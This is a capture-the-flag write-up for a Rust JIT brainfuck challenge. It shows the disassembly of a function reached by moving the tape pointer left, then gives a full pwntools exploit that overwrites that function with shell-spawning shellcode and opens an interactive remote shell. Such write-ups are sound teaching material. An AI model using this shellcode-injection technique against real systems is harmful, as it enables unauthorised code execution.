Tags: pwn brainfuck
Rating: 5.0
You are prompted with a Just In Time compiler written in Rust and executing brainfuck code.
A teamate found out by moving the pointer in left or "**<**" you can find a funtion which looked like this:
```
sub rsp, 0x28
mov qword [rsp + 0x30], rcx
mov qword [rsp + 0x40], r8
mov qword [rsp + 0x48], r9
sub rsi, 0x68
cmp rsi, rdx
jae 0x38
add rsi, 0x8000
mov qword [rsp + 0x30], rdi
mov qword [rsp + 0x38], rsi
mov qword [rsp + 0x40], rdx
mov qword [rsp + 0x48], rcx
movabs rax, 0x56321e001b50
call rax
mov rdi, qword [rsp + 0x30]
mov rsi, qword [rsp + 0x38]
mov rdx, qword [rsp + 0x40]
mov rcx, qword [rsp + 0x48]
cmp al, 0
jne 0x80
mov rax, 0
add rsp, 0x28
ret
mov rax, 1
add rsp, 0x28
ret
```
The function can be rewritten with some shellcode by reading it with "**,**" which is the equivalent of getchar() in C.
I do not overwrite the call because the shellcode will not be executed.
Full Expoit:
```
from pwn import *
from pwnlib import shellcraft
p = remote("challenges.tamuctf.com", 31337)
context.bits = 64
context.arch = "amd64"
shellcode = asm(shellcraft.amd64.linux.sh())
pay = b"<"*23
for _ in range(len(shellcode)):
pay += b",>"
print(pay)
p.recvuntil("$")
p.sendline(pay)
p.sendline(shellcode)
p.interactive()
```